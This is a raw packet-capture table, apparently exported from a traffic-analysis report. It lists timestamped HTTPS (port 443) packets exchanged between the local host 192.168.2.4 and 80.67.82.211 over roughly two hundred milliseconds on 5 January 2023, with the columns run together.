                                                                                                                                                                                    Jan 5, 2023 08:58:10.602216005 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.602679014 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.602771997 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.602982044 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.603406906 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.603454113 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.603528023 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.614054918 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.614129066 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.614936113 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.614939928 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.614979982 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.614984989 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.615008116 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.615031958 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.620631933 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.620692015 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.620786905 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.622698069 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.622729063 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.709279060 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.709389925 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.721487045 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.721518040 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.721873999 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.721889973 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.722053051 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.722138882 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.736274004 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.736320019 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.736351013 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.736373901 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.736409903 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.736427069 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.736457109 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.736500978 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.737128973 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.737164021 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.737214088 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.737238884 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.737261057 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.737288952 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.737308979 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.737344980 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.738679886 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.738739014 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.738823891 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.738843918 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.738869905 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.738953114 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.747705936 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.747788906 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.747823954 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.747850895 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.747878075 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.747906923 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.748176098 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.748277903 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.748753071 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.748951912 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.749675035 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.749725103 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.749808073 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.749828100 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.749865055 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.749890089 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.750731945 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.750782013 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.750837088 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.750855923 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.750896931 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.750937939 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.751480103 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.751672029 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.752657890 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.752756119 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.757087946 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.757111073 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.757380009 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.757385969 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.757520914 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.757731915 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.759705067 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.759761095 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.759819984 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.759844065 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.759885073 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.759908915 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.760602951 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.760704994 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.760741949 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.760757923 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.760796070 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.760812998 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.761440992 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.761557102 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.762407064 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.762461901 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.762536049 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.762552023 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.762577057 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.762617111 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.763010979 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.763030052 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.763550043 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.763597965 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.763649940 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.763667107 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.763715029 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.763735056 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.763767004 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.763778925 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.763807058 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.763844967 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.764107943 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.764183998 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.765361071 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.765412092 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.765471935 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.765491009 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.765628099 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.765628099 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.765754938 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.765800953 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.765856028 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.765871048 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.765917063 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.765937090 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.766743898 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.766856909 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.767194986 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.767210960 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.767760992 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.767807007 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.767859936 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.767885923 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.767915010 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.768032074 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.768767118 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.768816948 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.768882990 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.768899918 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.768950939 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.768950939 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.769575119 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.769673109 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.772257090 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.772296906 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.772381067 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.772402048 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.772423029 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.772449017 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.772471905 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.772877932 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.772927046 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.772981882 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.773008108 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.773061991 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.773087978 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.774367094 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.774414062 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.774466991 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.774490118 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.774516106 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.775274038 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.775312901 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.775377035 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.775377035 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.775394917 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.775420904 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.775420904 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.775441885 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.777281046 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.777391911 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.780728102 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.780781031 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.780864954 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.780879974 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.780909061 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.780931950 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.781764030 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.781816959 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.781867027 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.781919956 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.781951904 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.781971931 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.783652067 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.783701897 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.783761024 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.783778906 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.783807039 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.784688950 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.784787893 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.784804106 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.784872055 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.786448002 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.786499977 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.786556959 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.786575079 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.786619902 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.786639929 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.787758112 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.787806034 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.787877083 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.787893057 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.787925005 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.787944078 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.788342953 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.788450956 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.789604902 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.789650917 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.789731026 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.789747000 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.789774895 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.789814949 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.790909052 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.790963888 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.791023970 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.791039944 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.791080952 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.791101933 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.791655064 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.791768074 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.792481899 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.792537928 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.792582989 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.792608976 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.792639971 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.793176889 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.793224096 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.793275118 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.793289900 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.793324947 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.793344021 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.796717882 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.796771049 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.796818972 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.796834946 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.796890020 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.796916008 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.797198057 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.797290087 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.798280001 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.798337936 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.798379898 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.798389912 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.798429012 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.798438072 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.798474073 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.798497915 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.799149990 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.799201012 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.799257994 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.799278975 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.799319983 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.799350977 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.800215006 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.800263882 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.800329924 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.800338030 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.800363064 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.800398111 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.800434113 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.800440073 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.800687075 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.800734997 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.800800085 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.800813913 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.800847054 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.800852060 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.800862074 CET4434973480.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.800880909 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.800945997 CET49734443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.802606106 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.802680969 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.802757978 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.802777052 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.802819014 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.802841902 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.803735018 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.803790092 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.803859949 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.803869963 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.803929090 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.803965092 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.805179119 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.805792093 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.813663006 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.813739061 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.813807964 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.813824892 CET4434973280.67.82.211192.168.2.4
